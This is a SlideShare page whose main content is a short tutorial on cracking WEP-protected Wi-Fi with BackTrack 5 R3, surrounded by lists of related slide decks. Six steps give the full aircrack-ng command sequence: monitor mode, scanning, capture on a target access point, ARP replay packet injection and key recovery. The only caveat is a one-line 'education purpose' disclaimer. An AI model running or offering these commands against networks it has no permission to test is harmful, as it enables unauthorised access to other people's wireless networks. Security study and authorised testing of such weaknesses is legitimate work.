SlideShare uma empresa Scribd logo
1 de 2
Exploit WEP Flaws in six steps using BackTrack 5 R3
Disclaimer
I provide this document for education purpose without any
responsibility of any illegal use
Prerequisites
1. Backtrack 5 r3
2. Wireless interface compatible with backtrack
a. Check this list http://www.aircrackng.org/doku.php?
id=compatibility_drivers
Scope of this document is WEP
1-Start wireless interface in monitoring mode
airmon-ng start wlan0
2-list all wireless APs, hosts attached to them, their operating
channels and encryption methods
airodump-ng mon0
3-you must set the monitor interface mon0 on the same channel as
access point
iwconfig mon0 channel 11
4-airodump-ng --bssid 00:16:01:AE:21:64 --channel 11
--write wepcarack222demo mon0
00:16:01:AE:21:69 is AP address obtained from step 2
wepcarack222demo output file name
channel obtained from 2
5- From step 4 select connected host or wait for any if none
aireplay-ng -3 -b 00:16:01:AE:21:64 -h F0:D1:A9:F0:34:6C
mon0
6-aircrack-ng wepcarack222demo-03.cap
Steps 4-5-6 must be on different terminal simultaneously
Any questions drop an email to mohammedomar@yahoo.com

Mais conteúdo relacionado

Mais procurados

How to configure Extended acl for an ip address
How to configure Extended acl for an ip addressHow to configure Extended acl for an ip address
How to configure Extended acl for an ip address
tcpipguru
 
How to configure Standard ACL for a network
How to configure Standard ACL  for a networkHow to configure Standard ACL  for a network
How to configure Standard ACL for a network
tcpipguru
 
R E M O T A A T I T E L
R E M O T A  A T I T E LR E M O T A  A T I T E L
R E M O T A A T I T E L
Fxx
 
How to configure Extended acl for a network
How to configure Extended acl for a networkHow to configure Extended acl for a network
How to configure Extended acl for a network
tcpipguru
 
Router security-configuration-guide-executive-summary
Router security-configuration-guide-executive-summaryRouter security-configuration-guide-executive-summary
Router security-configuration-guide-executive-summary
moonmanik
 
Visio-VSCHO001_Design
Visio-VSCHO001_DesignVisio-VSCHO001_Design
Visio-VSCHO001_Design
Rick Galvez
 

Mais procurados (17)

Cisco Switch How To - Secure a Switch Port
Cisco Switch How To - Secure a Switch PortCisco Switch How To - Secure a Switch Port
Cisco Switch How To - Secure a Switch Port
 
Switching and Port Security
  Switching and Port Security  Switching and Port Security
Switching and Port Security
 
Vlans
VlansVlans
Vlans
 
How to Configure Private VLANs on Cisco Switches
How to Configure Private VLANs on Cisco SwitchesHow to Configure Private VLANs on Cisco Switches
How to Configure Private VLANs on Cisco Switches
 
Telnet configuration
Telnet configurationTelnet configuration
Telnet configuration
 
How to configure Extended acl for an ip address
How to configure Extended acl for an ip addressHow to configure Extended acl for an ip address
How to configure Extended acl for an ip address
 
How to configure Standard ACL for a network
How to configure Standard ACL  for a networkHow to configure Standard ACL  for a network
How to configure Standard ACL for a network
 
R E M O T A A T I T E L
R E M O T A  A T I T E LR E M O T A  A T I T E L
R E M O T A A T I T E L
 
Network
NetworkNetwork
Network
 
How to configure Extended acl for a network
How to configure Extended acl for a networkHow to configure Extended acl for a network
How to configure Extended acl for a network
 
Basic Cisco 800 Router Configuration for Internet Access
Basic Cisco 800 Router Configuration for Internet AccessBasic Cisco 800 Router Configuration for Internet Access
Basic Cisco 800 Router Configuration for Internet Access
 
Router security-configuration-guide-executive-summary
Router security-configuration-guide-executive-summaryRouter security-configuration-guide-executive-summary
Router security-configuration-guide-executive-summary
 
Frame - MAC Address Threats & Vulnerabilities
Frame - MAC Address Threats & VulnerabilitiesFrame - MAC Address Threats & Vulnerabilities
Frame - MAC Address Threats & Vulnerabilities
 
CCIE R&S Real Lab Workbbok 2018 updated
CCIE R&S Real Lab Workbbok 2018 updatedCCIE R&S Real Lab Workbbok 2018 updated
CCIE R&S Real Lab Workbbok 2018 updated
 
Visio-VSCHO001_Design
Visio-VSCHO001_DesignVisio-VSCHO001_Design
Visio-VSCHO001_Design
 
Configuracao de switch
Configuracao de switchConfiguracao de switch
Configuracao de switch
 
یادگیری هک کلاه سفید و تست نفوذ به شبکه
یادگیری هک کلاه سفید و تست نفوذ به شبکهیادگیری هک کلاه سفید و تست نفوذ به شبکه
یادگیری هک کلاه سفید و تست نفوذ به شبکه
 

Destaque (6)

Part II - Summary of service oriented architecture (SOA) concepts, technology...
Part II - Summary of service oriented architecture (SOA) concepts, technology...Part II - Summary of service oriented architecture (SOA) concepts, technology...
Part II - Summary of service oriented architecture (SOA) concepts, technology...
 
Togaf notes
Togaf notesTogaf notes
Togaf notes
 
Cloud computing in Arabic
Cloud computing in ArabicCloud computing in Arabic
Cloud computing in Arabic
 
Togaf project
Togaf projectTogaf project
Togaf project
 
Togaf 9 catalogs, matrices and diagrams
Togaf 9 catalogs, matrices and diagrams  Togaf 9 catalogs, matrices and diagrams
Togaf 9 catalogs, matrices and diagrams
 
TOGAF 9 Architectural Artifacts
TOGAF 9  Architectural ArtifactsTOGAF 9  Architectural Artifacts
TOGAF 9 Architectural Artifacts
 

Semelhante a Exploit wep flaws in six steps using backtrack 5 r3 (crack hack wireless)

Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration        Reconnaissance and inform.docxLab-5 Scanning and Enumeration        Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
LaticiaGrissomzz
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
Hammam Samara
 
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docxINFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
carliotwaycave
 
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer   configuring a zone-based policy firewall (zpf) instru...4.4.1.3 packet tracer   configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
Salem Trabelsi
 

Semelhante a Exploit wep flaws in six steps using backtrack 5 r3 (crack hack wireless) (20)

Nexus 1000v part ii
Nexus 1000v part iiNexus 1000v part ii
Nexus 1000v part ii
 
Aircrack
AircrackAircrack
Aircrack
 
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration        Reconnaissance and inform.docxLab-5 Scanning and Enumeration        Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way HandshakeWireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
 
Backtrack Manual Part10
Backtrack Manual Part10Backtrack Manual Part10
Backtrack Manual Part10
 
Switch security
Switch securitySwitch security
Switch security
 
1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618) 1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618)
 
cracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrackcracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrack
 
Asa pixfwsm multicast tips and common problems
Asa pixfwsm multicast tips and common problemsAsa pixfwsm multicast tips and common problems
Asa pixfwsm multicast tips and common problems
 
Wi fi hacking
Wi fi hackingWi fi hacking
Wi fi hacking
 
1 CRACKING WEP.pptx
1 CRACKING WEP.pptx1 CRACKING WEP.pptx
1 CRACKING WEP.pptx
 
6. hands on - open mano demonstration in remote pool of servers
6. hands on - open mano demonstration in remote pool of servers6. hands on - open mano demonstration in remote pool of servers
6. hands on - open mano demonstration in remote pool of servers
 
Air os qs
Air os qsAir os qs
Air os qs
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones Hijacking
 
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docxINFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
 
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer   configuring a zone-based policy firewall (zpf) instru...4.4.1.3 packet tracer   configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
 
Alcatel vm
Alcatel vmAlcatel vm
Alcatel vm
 

Mais de Mohammed Omar

Enterprise architecture at work part1
Enterprise architecture at work part1Enterprise architecture at work part1
Enterprise architecture at work part1
Mohammed Omar
 

Mais de Mohammed Omar (9)

Srs example 2010_group2
Srs example 2010_group2Srs example 2010_group2
Srs example 2010_group2
 
Its handbook
Its handbookIts handbook
Its handbook
 
البتكوين ببساطة bitcoin made easy
البتكوين ببساطة bitcoin made easyالبتكوين ببساطة bitcoin made easy
البتكوين ببساطة bitcoin made easy
 
Zadak solution architecture components (1)
Zadak solution architecture components (1)Zadak solution architecture components (1)
Zadak solution architecture components (1)
 
Enterprise architecture at work part1
Enterprise architecture at work part1Enterprise architecture at work part1
Enterprise architecture at work part1
 
Part I -Summary of service oriented architecture (soa) concepts, technology, ...
Part I -Summary of service oriented architecture (soa) concepts, technology, ...Part I -Summary of service oriented architecture (soa) concepts, technology, ...
Part I -Summary of service oriented architecture (soa) concepts, technology, ...
 
Introduction to Enterprise Architecture
Introduction to Enterprise ArchitectureIntroduction to Enterprise Architecture
Introduction to Enterprise Architecture
 
itil process maturity assessment
itil process maturity assessmentitil process maturity assessment
itil process maturity assessment
 
A comparison of the top four enterprise
A comparison of the top four enterpriseA comparison of the top four enterprise
A comparison of the top four enterprise
 

Último

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 

Último (20)

What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 

Exploit wep flaws in six steps using backtrack 5 r3 (crack hack wireless)

  • 1. Exploit WEP Flaws in six steps using BackTrack 5 R3 Disclaimer I provide this document for education purpose without any responsibility of any illegal use Prerequisites 1. Backtrack 5 r3 2. Wireless interface compatible with backtrack a. Check this list http://www.aircrackng.org/doku.php? id=compatibility_drivers Scope of this document is WEP 1-Start wireless interface in monitoring mode airmon-ng start wlan0 2-list all wireless APs, hosts attached to them, their operating channels and encryption methods airodump-ng mon0 3-you must set the monitor interface mon0 on the same channel as access point iwconfig mon0 channel 11 4-airodump-ng --bssid 00:16:01:AE:21:64 --channel 11 --write wepcarack222demo mon0 00:16:01:AE:21:69 is AP address obtained from step 2
  • 2. wepcarack222demo output file name channel obtained from 2 5- From step 4 select connected host or wait for any if none aireplay-ng -3 -b 00:16:01:AE:21:64 -h F0:D1:A9:F0:34:6C mon0 6-aircrack-ng wepcarack222demo-03.cap Steps 4-5-6 must be on different terminal simultaneously Any questions drop an email to mohammedomar@yahoo.com